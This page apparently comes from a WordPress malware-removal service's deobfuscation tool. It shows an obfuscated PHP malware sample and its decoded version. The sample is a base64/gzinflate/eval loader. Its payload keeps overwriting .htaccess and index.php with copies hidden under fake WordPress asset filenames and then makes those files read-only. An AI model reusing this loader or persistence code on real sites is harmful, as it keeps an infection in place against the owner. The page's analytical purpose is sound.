Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$MdRwlQi6788[(105/15)].$MdRwlQi6788[(26-1)].$MdRwlQi6788[(1*49)].$MdRwlQi6788[((10*1)+18)].$MdRwlQi6788[(14+22)].$MdRwlQi6788[(44+5)].$MdRwlQi6788[(44-13)].$MdRwlQi6788[(684/18)].$MdRwlQi6788[(23+4)].$MdRwlQi6788[(72-(...



Obfuscated php code

<?php $MdRwlQi6788='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$MdRwlQi6788[(105/15)].$MdRwlQi6788[(26-1)].$MdRwlQi6788[(1*49)].$MdRwlQi6788[((10*1)+18)].$MdRwlQi6788[(14+22)].$MdRwlQi6788[(44+5)].$MdRwlQi6788[(44-13)].$MdRwlQi6788[(684/18)].$MdRwlQi6788[(23+4)].$MdRwlQi6788[(72-(33-7))].$MdRwlQi6788[(154/22)].$MdRwlQi6788[(11+25)].$MdRwlQi6788[(65-(62-31))].$MdRwlQi6788[(26-6)].$MdRwlQi6788[((27*2)-8)];$pHFdNhg9688=$MdRwlQi6788[(20-9)].$MdRwlQi6788[(2*4)].$MdRwlQi6788[(29*1)].$MdRwlQi6788[(160/4)];$MYtraky2482=$MdRwlQi6788[(8*5)].$MdRwlQi6788[((1+0)+2)].$MdRwlQi6788[(6+(1*(95/19)))].$MdRwlQi6788[(140/5)].$MdRwlQi6788[(522/18)].$MdRwlQi6788[(7*((7-3)-2))].$MdRwlQi6788[(2*14)].$MdRwlQi6788[(138/(2+4))].$MdRwlQi6788[(1029/(378/18))].$MdRwlQi6788[((2*189)/9)].$MdRwlQi6788[(12+(0+0))].$MdRwlQi6788[(31*1)].$MdRwlQi6788[(48/(36/12))].$MdRwlQi6788[(735/15)].$MdRwlQi6788[(0+7)].$MdRwlQi6788[(18+2)].$MdRwlQi6788[(18-(10/5))].$MdRwlQi6788[(735/15)].$MdRwlQi6788[(0+(2-(1*1)))].$MdRwlQi6788[(16-(3+(36/(0+18))))].$MdRwlQi6788[((167-23)/18)].$MdRwlQi6788[(0+(18-9))].$MdRwlQi6788[(1*3)].$MdRwlQi6788[(11*(1+(0/(78/13))))].$MdRwlQi6788[(2*7)].$MdRwlQi6788[(29*(0+1))].$MdRwlQi6788[(38-(8+9))].$MdRwlQi6788[(15*2)].$MdRwlQi6788[(45-11)].$MdRwlQi6788[(1*46)].$MdRwlQi6788[(1*(17+21))].$MdRwlQi6788[(78/3)].$MdRwlQi6788[(21+(77/11))].$MdRwlQi6788[(22+14)].$MdRwlQi6788[(343/(91/13))].$MdRwlQi6788[(1*1)].$MdRwlQi6788[(21-10)].$MdRwlQi6788[(22+(12/2))].$MdRwlQi6788[(180/20)].$MdRwlQi6788[(3+((0+0)*1))].$MdRwlQi6788[(686/(126/9))].$MdRwlQi6788[(61-(32-8))].$MdRwlQi6788[(476/17)].$MdRwlQi6788[((4-0)+22)].$MdRwlQi6788[(((23-(2*5))/13)-0)].$MdRwlQi6788[(7+(84/21))].$MdRwlQi6788[(28/2)].$MdRwlQi6788[(9-0)].$MdRwlQi6788[(3*1)];$UrR1094= "'tZRRa4MwFIXfC/0PFqS2UO2mspdSGGx93Apdt5cxxCapptUoJmFlo/99sWp1RVstNi9Cbs459zOXyC6zeORJU0m23maLj9niU3meP72/zF6X1mI+XypfmjLWXGYDgChVJt2OjEkNCSYQ7bTQDWOJEK22loi6v6D6DlUb+piMAaVjwCkLfPyDVB8RTtWIeZqoaSDtI7HU61puUkeirmywdaKAE3jw2xTtjMt2mACPQ0TH2Lcd8YE2Q+qKs9jaFMzEyZnFv2rEDFEYISAMoYCG2FY3tMgr7JrwcooilXJHdMliVFpgFVZXsNoedogKEGHCuQiL1wM5naV+X1pjD1lohymjg+zqh8PfbkcSSxzt/TuQ6IZSEEmDuEDFnee7vamUbx69MrN4PQLXD2CmGN09mOZwUigfwkLOLBCIvkkeOTpUHFSsHBMm1QFmHrDvdvY16PUW6fWb0+st0xst0hs3pzea06dPYgl9/ABU0ye6U/ps95Q+8SqjTxS16NOj5fRJQgl9FtCc/szkN6avmPwW6csn/3r6M5PfmL5i8lukL5/8Cvo/'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481();

Decoded(de-Obfuscated) php code

<?php

$MdRwlQi6788 = 'y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';
$q2866 = "create_function";
$pHFdNhg9688 = "\$x=\"";
$MYtraky2482 = "\";\$a=base64_decode(\$x);\$b=gzinflate(\$a);eval(\$b);";
$UrR1094 = "'tZRRa4MwFIXfC/0PFqS2UO2mspdSGGx93Apdt5cxxCapptUoJmFlo/99sWp1RVstNi9Cbs459zOXyC6zeORJU0m23maLj9niU3meP72/zF6X1mI+XypfmjLWXGYDgChVJt2OjEkNCSYQ7bTQDWOJEK22loi6v6D6DlUb+piMAaVjwCkLfPyDVB8RTtWIeZqoaSDtI7HU61puUkeirmywdaKAE3jw2xTtjMt2mACPQ0TH2Lcd8YE2Q+qKs9jaFMzEyZnFv2rEDFEYISAMoYCG2FY3tMgr7JrwcooilXJHdMliVFpgFVZXsNoedogKEGHCuQiL1wM5naV+X1pjD1lohymjg+zqh8PfbkcSSxzt/TuQ6IZSEEmDuEDFnee7vamUbx69MrN4PQLXD2CmGN09mOZwUigfwkLOLBCIvkkeOTpUHFSsHBMm1QFmHrDvdvY16PUW6fWb0+st0xst0hs3pzea06dPYgl9/ABU0ye6U/ps95Q+8SqjTxS16NOj5fRJQgl9FtCc/szkN6avmPwW6csn/3r6M5PfmL5i8lukL5/8Cvo/'";
$JTx2343 = $pHFdNhg9688;
$JTx2343 = "\$x=\"'tZRRa4MwFIXfC/0PFqS2UO2mspdSGGx93Apdt5cxxCapptUoJmFlo/99sWp1RVstNi9Cbs459zOXyC6zeORJU0m23maLj9niU3meP72/zF6X1mI+XypfmjLWXGYDgChVJt2OjEkNCSYQ7bTQDWOJEK22loi6v6D6DlUb+piMAaVjwCkLfPyDVB8RTtWIeZqoaSDtI7HU61puUkeirmywdaKAE3jw2xTtjMt2mACPQ0TH2Lcd8YE2Q+qKs9jaFMzEyZnFv2rEDFEYISAMoYCG2FY3tMgr7JrwcooilXJHdMliVFpgFVZXsNoedogKEGHCuQiL1wM5naV+X1pjD1lohymjg+zqh8PfbkcSSxzt/TuQ6IZSEEmDuEDFnee7vamUbx69MrN4PQLXD2CmGN09mOZwUigfwkLOLBCIvkkeOTpUHFSsHBMm1QFmHrDvdvY16PUW6fWb0+st0xst0hs3pzea06dPYgl9/ABU0ye6U/ps95Q+8SqjTxS16NOj5fRJQgl9FtCc/szkN6avmPwW6csn/3r6M5PfmL5i8lukL5/8Cvo/'";
$JTx2343 = "\$x=\"'tZRRa4MwFIXfC/0PFqS2UO2mspdSGGx93Apdt5cxxCapptUoJmFlo/99sWp1RVstNi9Cbs459zOXyC6zeORJU0m23maLj9niU3meP72/zF6X1mI+XypfmjLWXGYDgChVJt2OjEkNCSYQ7bTQDWOJEK22loi6v6D6DlUb+piMAaVjwCkLfPyDVB8RTtWIeZqoaSDtI7HU61puUkeirmywdaKAE3jw2xTtjMt2mACPQ0TH2Lcd8YE2Q+qKs9jaFMzEyZnFv2rEDFEYISAMoYCG2FY3tMgr7JrwcooilXJHdMliVFpgFVZXsNoedogKEGHCuQiL1wM5naV+X1pjD1lohymjg+zqh8PfbkcSSxzt/TuQ6IZSEEmDuEDFnee7vamUbx69MrN4PQLXD2CmGN09mOZwUigfwkLOLBCIvkkeOTpUHFSsHBMm1QFmHrDvdvY16PUW6fWb0+st0xst0hs3pzea06dPYgl9/ABU0ye6U/ps95Q+8SqjTxS16NOj5fRJQgl9FtCc/szkN6avmPwW6csn/3r6M5PfmL5i8lukL5/8Cvo/'\";\$a=base64_decode(\$x);\$b=gzinflate(\$a);eval(\$b);";
@($mEriqO3481 = function () {
    $x = "'tZRRa4MwFIXfC/0PFqS2UO2mspdSGGx93Apdt5cxxCapptUoJmFlo/99sWp1RVstNi9Cbs459zOXyC6zeORJU0m23maLj9niU3meP72/zF6X1mI+XypfmjLWXGYDgChVJt2OjEkNCSYQ7bTQDWOJEK22loi6v6D6DlUb+piMAaVjwCkLfPyDVB8RTtWIeZqoaSDtI7HU61puUkeirmywdaKAE3jw2xTtjMt2mACPQ0TH2Lcd8YE2Q+qKs9jaFMzEyZnFv2rEDFEYISAMoYCG2FY3tMgr7JrwcooilXJHdMliVFpgFVZXsNoedogKEGHCuQiL1wM5naV+X1pjD1lohymjg+zqh8PfbkcSSxzt/TuQ6IZSEEmDuEDFnee7vamUbx69MrN4PQLXD2CmGN09mOZwUigfwkLOLBCIvkkeOTpUHFSsHBMm1QFmHrDvdvY16PUW6fWb0+st0xst0hs3pzea06dPYgl9/ABU0ye6U/ps95Q+8SqjTxS16NOj5fRJQgl9FtCc/szkN6avmPwW6csn/3r6M5PfmL5i8lukL5/8Cvo/'";
    $a = "Qk0\24\v\17\26PR\30l}\n]1&(&ae}juE[-6/Bn93.xISIfSy?^b>_*_2\\f\3(U&ݎI\r\t&\20\rc\20\16U\33\1c)\v|T\37\21NՈyi #ZnRGlu\23x\24v\0CDط\356Cꊳ\24əſj\fQ\30! \fV7+r\"rGtbTZ`\25VW\36v\n\20a¹\10\39~_Zc\17Yh)nG\22K\34;R\20I@ŝ绽o\362x=\2\17`\30=pR(\37B,\20I\369:T\34T\34\23&\1f\36v5\26-\33-\03377ӧOb\t}\0T'Sl>*O\24ӣIB\t}\26М7\26'z3ߘb[/\n?";
    $b = "\$ht_url = \$_SERVER['DOCUMENT_ROOT'].'/.htaccess';\r\n\$in_url = \$_SERVER['DOCUMENT_ROOT'].'/index.php';\r\n\r\n\$bk_ht_1 = \$_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/customize-menus-rtl.min.css';\r\n\$bk_ht_2 = \$_SERVER['DOCUMENT_ROOT'].'/wp-admin/js/custon-background.min.js';\r\n\$bk_ht_3 = \$_SERVER['DOCUMENT_ROOT'].'/wp-includes/images/date-button-4x.png';\r\n\r\n\$bk_in_1 = \$_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/deprecated-media-js.css';\r\n\$bk_in_2 = \$_SERVER['DOCUMENT_ROOT'].'/wp-admin/js/user-suggest.mins.js';\r\n\$bk_in_3 = \$_SERVER['DOCUMENT_ROOT'].'/wp-includes/images/align-center-4x.png';\r\n\r\nif(\$ht_url && file_exists(\$bk_ht_1)){\r\n    if(!file_exists(\$ht_url) or (filesize(\$ht_url) != filesize(\$bk_ht_1))){\r\n        @chmod(\$ht_url,0644);\r\n        @file_put_contents(\$ht_url,file_get_contents(\$bk_ht_1));\r\n        @chmod(\$ht_url,0444);\r\n    }\r\n}\r\nif(\$ht_url && file_exists(\$bk_ht_2)){\r\n    if(!file_exists(\$ht_url) or (filesize(\$ht_url) != filesize(\$bk_ht_2))){\r\n        @chmod(\$ht_url,0644);\r\n        @file_put_contents(\$ht_url,file_get_contents(\$bk_ht_2));\r\n        @chmod(\$ht_url,0444);\r\n    }\r\n}\r\nif(\$ht_url && file_exists(\$bk_ht_3)){\r\n    if(!file_exists(\$ht_url) or (filesize(\$ht_url) != filesize(\$bk_ht_3))){\r\n        @chmod(\$ht_url,0644);\r\n        @file_put_contents(\$ht_url,file_get_contents(\$bk_ht_3));\r\n        @chmod(\$ht_url,0444);\r\n    }\r\n}\r\nif(\$in_url && file_exists(\$bk_in_1)){\r\n    if(!file_exists(\$in_url) or (filesize(\$in_url) != filesize(\$bk_in_1))){\r\n        @chmod(\$in_url,0644);\r\n        @file_put_contents(\$in_url,file_get_contents(\$bk_in_1));\r\n        @chmod(\$in_url,0444);\r\n    }\r\n}\r\nif(\$in_url && file_exists(\$bk_in_2)){\r\n    if(!file_exists(\$in_url) or (filesize(\$in_url) != filesize(\$bk_in_2))){\r\n        @chmod(\$in_url,0644);\r\n        @file_put_contents(\$in_url,file_get_contents(\$bk_in_2));\r\n        @chmod(\$in_url,0444);\r\n    }\r\n}\r\nif(\$in_url && file_exists(\$bk_in_3)){\r\n    if(!file_exists(\$in_url) or (filesize(\$in_url) != filesize(\$bk_in_3))){\r\n        @chmod(\$in_url,0644);\r\n        @file_put_contents(\$in_url,file_get_contents(\$bk_in_3));\r\n        @chmod(\$in_url,0444);\r\n    }\r\n}";
    eval {
        $ht_url = $_SERVER['DOCUMENT_ROOT'] . '/.htaccess';
        $in_url = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
        $bk_ht_1 = $_SERVER['DOCUMENT_ROOT'] . '/wp-admin/css/customize-menus-rtl.min.css';
        $bk_ht_2 = $_SERVER['DOCUMENT_ROOT'] . '/wp-admin/js/custon-background.min.js';
        $bk_ht_3 = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/images/date-button-4x.png';
        $bk_in_1 = $_SERVER['DOCUMENT_ROOT'] . '/wp-admin/css/deprecated-media-js.css';
        $bk_in_2 = $_SERVER['DOCUMENT_ROOT'] . '/wp-admin/js/user-suggest.mins.js';
        $bk_in_3 = $_SERVER['DOCUMENT_ROOT'] . '/wp-includes/images/align-center-4x.png';
        if ($ht_url && file_exists($bk_ht_1)) {
            if (!file_exists($ht_url) or filesize($ht_url) != filesize($bk_ht_1)) {
                @chmod($ht_url, 0644);
                @file_put_contents($ht_url, file_get_contents($bk_ht_1));
                @chmod($ht_url, 0444);
            }
        }
        if ($ht_url && file_exists($bk_ht_2)) {
            if (!file_exists($ht_url) or filesize($ht_url) != filesize($bk_ht_2)) {
                @chmod($ht_url, 0644);
                @file_put_contents($ht_url, file_get_contents($bk_ht_2));
                @chmod($ht_url, 0444);
            }
        }
        if ($ht_url && file_exists($bk_ht_3)) {
            if (!file_exists($ht_url) or filesize($ht_url) != filesize($bk_ht_3)) {
                @chmod($ht_url, 0644);
                @file_put_contents($ht_url, file_get_contents($bk_ht_3));
                @chmod($ht_url, 0444);
            }
        }
        if ($in_url && file_exists($bk_in_1)) {
            if (!file_exists($in_url) or filesize($in_url) != filesize($bk_in_1)) {
                @chmod($in_url, 0644);
                @file_put_contents($in_url, file_get_contents($bk_in_1));
                @chmod($in_url, 0444);
            }
        }
        if ($in_url && file_exists($bk_in_2)) {
            if (!file_exists($in_url) or filesize($in_url) != filesize($bk_in_2)) {
                @chmod($in_url, 0644);
                @file_put_contents($in_url, file_get_contents($bk_in_2));
                @chmod($in_url, 0444);
            }
        }
        if ($in_url && file_exists($bk_in_3)) {
            if (!file_exists($in_url) or filesize($in_url) != filesize($bk_in_3)) {
                @chmod($in_url, 0644);
                @file_put_contents($in_url, file_get_contents($bk_in_3));
                @chmod($in_url, 0444);
            }
        }
    };
});
@$mEriqO3481();


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.